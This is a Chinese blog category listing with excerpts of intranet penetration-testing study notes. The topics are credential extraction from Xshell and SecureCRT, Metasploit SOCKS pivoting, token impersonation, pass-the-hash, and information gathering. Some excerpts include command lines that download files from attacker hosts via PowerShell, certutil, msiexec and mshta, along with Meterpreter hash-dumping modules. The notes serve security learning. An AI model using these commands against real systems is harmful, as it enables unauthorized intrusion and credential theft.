![](https://img-blog.csdnimg.cn/20201014180756918.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
内网基础
文章平均质量分 53
weixin_44912035
这个作者很懒,什么都没留下…
展开
-
凭据获取学习记录
常见凭据获取常见运维工具凭据获取xshell连接记录保存在xshell的安装目录下session目录中以后缀为xsh文件。工具下载地址:https://github.com/HyperSine/how-does-Xmanager-encrypt-passwordSecureCRTgithub下载链接:https://github.com/gitPoc32/Forensic/tree/master/VanDykeSecureCRT运行命令:python VanDyke_SecureCRT_de原创 2022-02-03 20:40:13 · 2283 阅读 · 0 评论 -
内网渗透-跳板搭建
查看socks模块搭建socks5代理use auxiliary/server/socksset SRVHOST 192.168.106.10set SRVPORT 3080run设置带有账号、密码认证的socks5代理连接代理kali连接代理首先修改/etc/proxychains.conf文件proxychains namp ……windows使用proxifier连接...原创 2021-02-12 00:10:49 · 1223 阅读 · 1 评论 -
内网渗透-windows令牌窃取
令牌(token)访问令牌(Access Token):表示访问控制操作主体的系统对象会话令牌(Session Token):是交互会话中唯一的身份标识符。密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾msf伪造令牌use incognito #进入incognito模块list_tokens -u #列出令牌Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程原创 2021-02-10 15:46:09 · 324 阅读 · 0 评论 -
内网渗透-hash传递
passingthehash 获取hash值run post/windows/gather/smart_hashdump检查权限和系统类型检查是否是域控服务器从注册表读取hash,注入lsass进程如果是08server并具有管理员权限直接getsystem如果是windows且uac关闭具有管理员权限,直接读取03/xp直接getsystem 从注册表获取hash获取到meterpreter,先进程迁移再提权,然后hashdumphash传递exploit/windows/smb/p原创 2021-02-09 16:07:21 · 430 阅读 · 0 评论 -
内网-文件上传与下载
powershell(new-object Net.WebClient).DownloadFile('http://192.168.174.130/ip.txt','C:\ip.txt')certutilCertutil –urlcache –split –f http://192.168.174.130:8000/ip.txtmsiexecMsiexec /q /i http://192.168.3.1/test.txtmshtaMshta http://192.168.174.原创 2021-02-07 20:26:30 · 662 阅读 · 0 评论 -
内网渗透之信息收集(更新中)
基本信息net命令家族wmi命令家族spn服务名其他(route,query)安全防护进程杀软进程名单## msf信息收集模块auxitiary系列post系列获取目标机器的分区情况run post/windows/gather/arp_scannerDevice Name: Type: Size (bytes):\\.\A: 4702111234474983745\\.\D原创 2021-02-06 23:41:15 · 315 阅读 · 1 评论